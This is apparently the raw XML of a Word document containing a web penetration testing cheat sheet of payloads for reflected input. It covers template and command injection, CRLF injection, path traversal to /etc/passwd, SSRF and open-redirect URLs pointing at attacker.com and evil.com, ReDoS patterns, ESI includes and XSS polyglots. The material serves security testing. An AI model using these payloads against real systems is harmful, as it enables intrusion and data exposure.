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77AF" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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pacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflecting Techniques - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CheatSheet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09E4F1AF" w14:textId="77777777" w:rsidR="00240D72" w:rsidRPr="00AA734D" w:rsidRDefault="00240D72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6D0D6D" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D13E2C" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to give the tester a fast </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of vulnerabilities he may exploit if his </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>input is somehow being reflected in the response</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4AF6A0" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>cheatsheet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't propose a comprehensive list of tests for each vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, just some basic ones. If you are looking for more comprehensive tests, access each vulnerability proposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE42D65" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>won't find Content-Type dependant injections like XXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, as usually you will try those yourself if you find a request sending xml data. You </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>won't also find database injections</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> here as even if some content might be reflected it depends heavily on the backend DB technology and structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AED973" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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14:paraId="322E843B" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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14:paraId="18AE4A4B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7164E779" w14:textId="64691DE7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711110E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{{7*7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}}[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7*7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C828EA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1;sleep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${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD68940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/*$(sleep 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5)`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sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C39FC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%0d%0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aLocation:%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20http://attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F295B4D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%3f%0d%0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aLocation:%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0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A08240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%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B18CA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%0d%0aContent-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Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type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:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E5788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&gt;&lt;b&gt;&lt;h1&gt;THIS IS AND INJECTED TITLE &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A20ED53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/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D58B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/../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881ADA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\..\..\..\..\..\etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F0215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/etc/hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C8EA8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/../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42397A67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C:/windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3219A42D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/../../../../../windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC1543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\..\..\..\..\..\windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768866AE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http://asdasdasdasd.burpcollab.com/mal.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D81C04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\\asdasdasdasd.burpcollab.com/mal.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7BA91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www.whitelisted.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D22D7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www.whitelisted.com.evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE8DF6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https://google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788F9F2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//google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9A21D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javascript:alert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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD0D47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(\\w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*)+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$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF30EFF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([a-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zA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Z]+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)*$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46931AF0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((a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+)+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)+$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D3BE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#echo var="DATE_LOCAL" --&gt;&lt;!--#exec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="ls" --&gt;&lt;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esi:include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=http://attacker.com/&gt;x=&lt;esi:assign name="var1" value="'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'"/&gt;&lt;s&lt;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esi:vars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name="$(var1)"/&gt;&gt;alert(/Chrome%20XSS%20filter%20bypass/);&lt;/s&lt;esi:vars name="$(var1)"/&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23702181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{{7*7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}}$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{7*7}&lt;%= 7*7 %&gt;${{7*7}}#{7*7}${{&lt;%[%'"}}%\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC20CC2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xsl:value-of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select="system-property('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xsl:version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')" /&gt;&lt;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esi:include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="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"&gt;&lt;/esi:include&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72703F7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 onclick=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 a="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FEC5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'"&gt;&lt;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img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=x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onerror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1) /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B525F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javascript:alert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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73F542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:"/*'/*`/*--&gt;&lt;/noscript&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/style&gt;&lt;/template&gt;&lt;/noembed&gt;&lt;/script&gt;&lt;html \"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onmouseover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=/*&amp;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lt;svg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/*/onload=alert()//&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794AA48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--&gt;'"/&gt;&lt;/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deTailS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open x="&gt;"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ontoggle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=(co\u006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efirm)`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`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D558D0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"&gt;&gt;&lt;marquee&gt;&lt;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img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=x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onerror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=confirm(1)&gt;&lt;/marquee&gt;" &gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/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onmouseover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=prompt(1) &gt;&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex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formaction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javascript:alert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(/XSS/) type=submit&gt;'--&gt;" &gt;&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;&lt;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img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/id="confirm( 1)"/alt="/"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="/"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onerror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=eval(id&amp;%23x29;&gt;'"&gt;&lt;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img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="http: //i.imgur.com/P8mL8.jpg"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761055ED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 onclick=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1)//&lt;button ‘ onclick=alert(1)//&gt; */ alert(1)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD661F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';alert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String.fromCharCode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(88,83,83))//';alert(String. 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88,83,83))//";alert(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String.fromCharCode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(88,83,83))//";alert(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String.fromCharCode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(88,83,83))//-- &gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(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String.fromCharCode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(88,83,83)) &lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFE04DC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3BB29610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5C03AB5F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6" w:history="1">
        <w:proofErr w:type="gramStart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Client Side</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd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 xml:space="preserve"> Template Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13D23BF3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035283FE" w14:textId="1BF1796B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F9E48E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{{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46602834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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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[7*7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F332A5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Fonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19EAE964" w14:textId="36C9D038" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="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4086822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{{7*7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}}[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7*7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E558712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58564FB8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318FD325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7" w:history="1"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Command Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75A3F067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2D4AA7F0" w14:textId="4C17D1D7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197A3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;ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0072ED53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||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ls;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="54072BFE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|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ls;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="322F9ADF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&amp;&amp;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ls;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="67553C05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&amp;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ls;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BEC71F1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%0Als</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC1A7E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ls`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EF13BD9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$(ls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5758784A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6DF90DD5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4791D923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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4143DD5F" w14:textId="6F750BCE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3904E31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1;sleep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${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32148EFC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/*$(sleep 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5)`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sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D4721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2E75F49E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7B6B3FC4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59BE2393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8" w:history="1"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CRLF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E67A9EC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19EEB5AD" w14:textId="1D707F24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5BC79E6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%0d%0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aLocation:%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20http://attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D5467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%3f%0d%0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aLocation:%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0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBEA54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%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24197C79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%0d%0aContent-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Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type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:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37A938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FE5A5D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00C8ED47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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Dangling Markup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37435C90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2E42DAC1" w14:textId="0FE7DF65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5CEE645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&gt;&lt;b&gt;&lt;h1&gt;THIS IS AND INJECTED TITLE &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E3318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5BBECF85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7D64BBD4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9" w:history="1"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File Inclusion/Path Traversal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C86C142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78B0C396" w14:textId="23EA1531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04C3DB1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/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E76DDD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/../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046EAAD4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\..\..\..\..\..\etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C3E17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/etc/hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906BF3E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/../../../../../etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E35A8E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C:/windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5715D9C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/../../../../../windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C512346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..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\..\..\..\..\..\windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC32F2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http://asdasdasdasd.burpcollab.com/mal.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF5261E" w14:textId="07479CBC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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00FE3183">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>\\asdasdasdasd.burpcollab.com/mal.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AB1CA99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0D6DB63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10C407CC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1" w:history="1"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Open Redirect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:proofErr w:type="gramStart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Server Side</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd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 xml:space="preserve"> Request Forgery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B6BC7BE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00DAAB6E" w14:textId="1CA8964F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FEF418C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www.whitelisted.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B2869A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www.whitelisted.com.evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2B914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https://google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE32D46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//google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CBDC2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javascript:alert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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF32555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13172763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5C188175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3" w:history="1">
        <w:proofErr w:type="spellStart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ReDoS</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="332B585F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20E9F973" w14:textId="7B0DDB91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B136873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(\\w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*)+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$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429ADC0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([a-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zA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Z]+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)*$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F86AC9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((a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+)+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)+$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513EBE3C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12393D57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5D2BDA5D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5A258439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4" w:history="1">
        <w:proofErr w:type="gramStart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Server Side</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd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 xml:space="preserve"> Inclusion/Edge Side Inclusion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C4E6B6D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177C23F2" w14:textId="58437929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07BAB65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#echo var="DATE_LOCAL" --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B092C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#exec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="ls" --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BC1C3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esi:include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=http://attacker.com/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31553B85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x=&lt;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esi:assign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name="var1" value="'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'"/&gt;&lt;s&lt;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esi:vars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name="$(var1)"/&gt;&gt;alert(/Chrome%20XSS%20filter%20bypass/);&lt;/s&lt;esi:vars name="$(var1)"/&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC906BB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5E419806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2DD92387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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E34AD15" w14:textId="2AA17BF9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5E103ED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#echo var="DATE_LOCAL" --&gt;&lt;!--#exec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="ls" --&gt;&lt;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esi:include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=http://attacker.com/&gt;x=&lt;esi:assign name="var1" value="'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'"/&gt;&lt;s&lt;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esi:vars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name="$(var1)"/&gt;&gt;alert(/Chrome%20XSS%20filter%20bypass/);&lt;/s&lt;esi:vars name="$(var1)"/&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A1E7B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7BD7F130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64607A54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5" w:history="1">
        <w:proofErr w:type="gramStart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Server Side</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd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 xml:space="preserve"> Requ</w:t>
        </w:r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e</w:t>
        </w:r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st Forgery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6441E38C" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The same tests used for Open Redirect can be used here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566DDDF" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734D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</w:p>
    <w:p w14:paraId="4EC35570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6" w:history="1">
        <w:proofErr w:type="gramStart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Server Side</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> Template Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36B192E3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555CE934" w14:textId="63C72E8C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86B4874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${{&lt;%[%'"}}%\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C77ECD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{{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58778E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${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF70CF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&lt;%= 7*7 %&gt;</w:t>
      </w:r>
